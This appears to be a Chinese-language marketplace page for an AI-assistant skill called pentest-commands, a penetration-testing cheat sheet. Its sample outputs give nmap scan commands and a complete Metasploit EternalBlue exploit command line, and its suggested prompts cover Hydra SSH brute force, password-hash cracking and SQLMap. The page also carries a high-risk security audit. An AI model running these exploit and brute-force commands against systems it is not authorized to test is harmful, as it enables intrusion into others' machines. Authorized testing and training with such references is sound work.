pentest-commands
渗透测试命令参考
此技能提供渗透测试工具的综合命令参考。它帮助安全专业人员在授权评估期间快速查找 nmap、Metasploit、nikto、SQLMap、Hydra 和其他安全测试命令。
下载技能 ZIP
在 Claude 中上传
前往 设置 → 功能 → 技能 → 上传技能
开启并开始使用
测试它
正在使用“pentest-commands”。 显示用于扫描 192.168.1.1 上端口的 nmap 命令
预期结果:
TCP SYN 扫描(隐蔽):nmap -sS 192.168.1.1
完整 TCP 连接扫描:nmap -sT 192.168.1.1
UDP 扫描:nmap -sU 192.168.1.1
所有端口:nmap -p- 192.168.1.1
服务版本:nmap -sV 192.168.1.1
操作系统检测:nmap -O 192.168.1.1
综合扫描:nmap -A 192.168.1.1
正在使用“pentest-commands”。 使用 EternalBlue 漏洞利用的 Metasploit 命令是什么?
预期结果:
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit"
或交互式:msfconsole > search type:exploit name:ms17_010
> use exploit/windows/smb/ms17_010_eternalblue
> set RHOST 192.168.1.1
> exploit
安全审计
高风险This skill provides a comprehensive reference for penetration testing tools including Metasploit, nmap, nikto, SQLMap, Hydra, John the Ripper, and Aircrack-ng. The static analysis confirmed critical findings related to exploitation frameworks and password cracking tools. While this is a legitimate security testing reference for authorized use, it provides unconstrained access to dangerous tools without authorization verification. Risk Level: HIGH - Recommend restricted distribution or content modifications to add authorization safeguards.
严重问题 (2)
高风险问题 (3)
中风险问题 (2)
低风险问题 (1)
风险因素
⚙️ 外部命令 (37)
🌐 网络访问 (84)
📁 文件系统访问 (2)
检测到的模式
质量评分
你能构建什么
安全专业人员快速参考
专业渗透测试人员使用此技能作为授权安全评估期间的快速命令查找。综合命令参考节省了搜索文档的时间。
安全培训和教育
学习渗透测试的学生使用此技能在实验环境中了解各种安全测试工具的正确命令语法。
红队行动
红队成员在授权红队参与期间使用此命令参考来快速执行网络扫描、漏洞利用和后漏洞利用命令。
试试这些提示
显示用于扫描目标网络 192.168.1.0/24 以发现活动主机和开放端口的 nmap 命令
查找用于搜索和使用 EternalBlue 漏洞利用针对 Windows 目标的 Metasploit 命令
显示用于暴力破解 SSH 登录的 Hydra 命令和用于破解密码哈希的 John the Ripper 命令
提供用于测试 http://192.168.1.100 处 Web 应用程序漏洞的 nikto 和 SQLMap 命令
最佳实践
- 在测试任何目标系统之前,务必验证您拥有书面授权
- 谨慎使用时间模板(-T4、-T5)以避免被检测或对系统造成影响
- 记录所有执行的命令和调查结果以用于渗透测试报告
避免
- 切勿在未经授权的系统上使用这些命令
- 避免运行可能破坏生产系统的激进扫描
- 不要分享或发布可能帮助恶意行为者的结果